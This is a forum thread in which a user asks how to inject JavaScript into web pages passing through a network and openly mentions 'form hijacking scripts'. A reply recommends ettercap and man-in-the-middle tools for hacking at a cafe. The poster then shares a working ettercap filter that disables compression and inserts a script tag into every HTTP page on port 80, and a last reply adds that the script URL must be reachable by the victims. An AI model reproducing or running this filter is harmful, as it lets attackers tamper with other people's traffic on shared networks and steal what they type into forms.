Jump to content

Is There A Way To Use Local Proxy Software To Add Content To Webpages?


cosbykid

Recommended Posts

Is there some way to use privoxy or some other piece of local proxying software to add content to webpages, specifically javascript? I realize that there are addons for browsers such as greasemonkey and other user-script type things, but I was looking for a browser-independent, possibly router level solution to adding scripts or content to webpages. I was thinking if they could do this sort of thing at public wi-fi hotspots (adding little bars or advertisements to the top of pages) a similar concept would be possible for home users, or technology enthusiasts (well, not ads, but form hijacking scripts). If anyone has any idea if this is possible, or if they have done it before, it would be useful they could assist me in this endeavor.

Sincerely,

cosbykid

Link to comment
Share on other sites

Squid and third party products do this on the enterprise networks, but if you were trying to do this to hack at a cafe, ettercap and most MITM tools would do the trick.

Link to comment
Share on other sites

I am thinking of another idea; if you can add a little bit to the website on a 'free' wifi, potentially you might serve adds as the bit to add. That way you can serve wifi for free, and make money (potentially).

Any ideas on how to do this>?

Link to comment
Share on other sites

okay, I believe I figured out how to do this with an ettercap filter

# a very simple filter that will add an arbitrary script to all html documents right before the beginning <body> tag

if (ip.proto == TCP && tcp.dst == 80)
{
    if (search(DATA.data, "Accept-Encoding"))
    {
           replace("Accept-Encoding", "Accept-Nothing!");
	}
}

if (ip.proto == TCP && tcp.src == 80)
{
	replace("<body", "<script src='script_source.js></script><body");
	msg("Script injected\n");
}

essentially, this should go in and add the script (specified by script_source.js right before the beginning body tag for all the traffic that matches the parameters specified (TCP traffic on port 80).

The "Accept-Encoding", "Accept-Nothing!" replace statement was something I found on the irongeek article about ettercap filters which supposedly stops content-compression on whatever site has "Accept-Encoding" in their header. The reason it's "Accept-Nothing!" instead of some other arbitrary expression is because for some reason it is necessary for the replaced statement to be the same length as the original statement being replaced.

Link to comment
Share on other sites

Just make sure

src='script_source.js

points to a URL they can reach.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...